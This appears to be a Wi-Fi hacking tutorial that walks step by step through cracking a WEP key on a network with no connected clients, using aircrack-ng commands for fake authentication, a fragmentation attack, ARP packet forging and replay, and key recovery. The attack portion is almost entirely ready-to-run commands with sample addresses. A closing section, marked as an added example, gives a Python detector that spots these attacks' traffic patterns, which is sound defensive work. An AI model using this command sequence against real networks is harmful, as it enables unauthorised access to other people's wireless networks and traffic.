Before explaining how to crack WEP without clients, I assume you have a network card from this list and the injection drivers installed (Kali is fully patched); if you have doubts, check our tutorial – How to install Packet Injection Drivers on Linux!
Once the drivers are installed, we must test that everything is working and that we are close enough to the Access Point (AP) to transmit packets to it!
- 1 Access Point
- 1 Laptop
- 1 Alfa Card
All tools in this tutorial come from the Aircrack-ng framework.
How does it work?
Cracking WEP is easy, but we have to keep in mind the real-world requirements and limitations we have to deal with. In this tutorial I will try to explain how to crack WEP without clients using the fragmentation, fake authentication and ARP request replay attacks; for the curious, I recommend reading these two tutorials first – Conditions to crack a Wifi password, How WEP Works and WEP Attacks.
Let's start with the theory. First we must put our network card into monitor mode to sniff packets from the air. Then we fake an authentication with the AP and apply the fragmentation attack to try to obtain the PRGA keystream. With the PRGA keystream in hand we create an ARP packet and inject it, then we start collecting unique IVs; once enough packets are collected we crack them to extract the password.
- Proximity to the AP
- AP filters client MAC addresses
- AP isn't generating data packets
- If it fails, use the Chopchop attack or interactive frame selection
Crack WEP without clients
Put the interface into monitor mode
airmon-ng start wlan0 7
Fake authentication attack
aireplay-ng -1 0 -e Wifisec -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0
Keep the connection to the AP alive
aireplay-ng -1 6000 -o 1 -q 10 -e Wifisec -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0
Fragmentation attack to obtain the PRGA keystream (written to a .xor file)
aireplay-ng -5 -b 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0
Forge an ARP request packet with the PRGA keystream
packetforge-ng -0 -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-request
Start capturing data and writing it to a file
airodump-ng -c 9 --bssid 9C:97:26:D7:94:71 -w capturedata mon0
Replay the forged ARP request to generate new IVs
aireplay-ng -2 -r arp-request mon0
Crack the key from the captured IVs
aircrack-ng -b 9C:97:26:D7:94:71 capture*.cap
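Seen from the AP owner's side, the procedure above leaves a recognisable footprint in monitor-mode traffic: one station authenticating over and over (the keep-alive fake authentication), the very same encrypted data frame re-sent many times (ARP request replay, which WEP cannot reject because it has no replay counter), and IVs being reused with different payloads (the keystream reuse that the cracking step depends on). The following is an added example, not part of the original tutorial or of Aircrack-ng: a small detector run over constructed frame summaries. The MAC addresses, IVs, payload bytes and thresholds are all assumed values chosen for the demonstration.

```python
"""Flag WEP-era attack footprints in a list of 802.11 frame summaries (added example)."""
from collections import Counter, defaultdict

# Constructed addresses (locally administered range) - not taken from any real capture.
STA_A = "02:00:00:00:00:a1"   # station that behaves like an injecting card
STA_B = "02:00:00:00:00:b2"   # ordinary client
BSSID = "02:00:00:00:ff:01"   # the access point under observation


def _auth(src, bssid=BSSID):
    """Summary of an 802.11 authentication request (management frame)."""
    return {"type": "mgmt", "subtype": "auth", "src": src, "bssid": bssid}


def _data(src, iv, payload, bssid=BSSID):
    """Summary of a WEP data frame: 3-byte IV (hex) plus encrypted payload (hex)."""
    return {"type": "data", "src": src, "bssid": bssid, "iv": iv, "payload": payload}


# Constructed sample traffic, mirroring what a monitor-mode sniffer would expose.
FRAMES = (
    [_auth(STA_A) for _ in range(8)]                           # repeated fake-auth keep-alive
    + [_auth(STA_B)]                                           # one normal association attempt
    + [_data(STA_A, "1a2b3c", "aa55aa55") for _ in range(6)]   # identical frame replayed
    + [
        _data(STA_B, "000001", "11223344"),
        _data(STA_B, "000002", "55667788"),
        _data(STA_B, "000002", "55667788"),                    # a single 802.11 retry: benign
        _data(STA_B, "000003", "99aabbcc"),
        _data(STA_B, "000001", "0f0f0f0f"),                    # IV 000001 reused, new payload
    ]
)


def auth_floods(frames, threshold=5):
    """Return {(station, bssid): count} for stations sending more than
    `threshold` authentication requests to the same AP.  Legitimate clients
    authenticate once per association; a steady stream is the keep-alive
    pattern of a fake-authentication tool."""
    counts = Counter(
        (f["src"], f["bssid"])
        for f in frames
        if f["type"] == "mgmt" and f["subtype"] == "auth"
    )
    return {key: n for key, n in counts.items() if n > threshold}


def replayed_frames(frames, threshold=2):
    """Return {(station, bssid, iv, payload): count} for encrypted data frames
    seen more than `threshold` times byte-for-byte identical.  One duplicate is
    a normal link-layer retry; many copies mean the frame is being replayed,
    which WEP cannot reject (WPA2/WPA3 carry a replay counter in every frame)."""
    counts = Counter(
        (f["src"], f["bssid"], f["iv"], f["payload"])
        for f in frames
        if f["type"] == "data"
    )
    return {key: n for key, n in counts.items() if n > threshold}


def iv_reuse(frames):
    """Return {(station, iv): [payloads]} where the same station used one IV
    for two or more different ciphertexts.  Same key + same IV means the same
    RC4 keystream, so XOR-ing the two ciphertexts leaks the XOR of the
    plaintexts; this is the statistical weakness the cracking step exploits."""
    seen = defaultdict(set)
    for f in frames:
        if f["type"] == "data":
            seen[(f["src"], f["iv"])].add(f["payload"])
    return {key: sorted(p) for key, p in seen.items() if len(p) > 1}


def analyze(frames):
    """Run all three detectors and return their findings in one dict."""
    return {
        "auth_floods": auth_floods(frames),
        "replays": replayed_frames(frames),
        "iv_reuse": iv_reuse(frames),
    }


if __name__ == "__main__":
    for name, findings in analyze(FRAMES).items():
        print(f"{name}:")
        for key, value in findings.items():
            print(f"  {key} -> {value}")
```

The thresholds are deliberately conservative so that a single retransmission or a client that re-associates after a dropped link is not reported; tune them to the observed baseline of your own network. The `iv_reuse` finding appears even without an attacker, because a 24-bit IV space is exhausted quickly on a busy AP, which is the underlying reason to retire WEP rather than only monitor it.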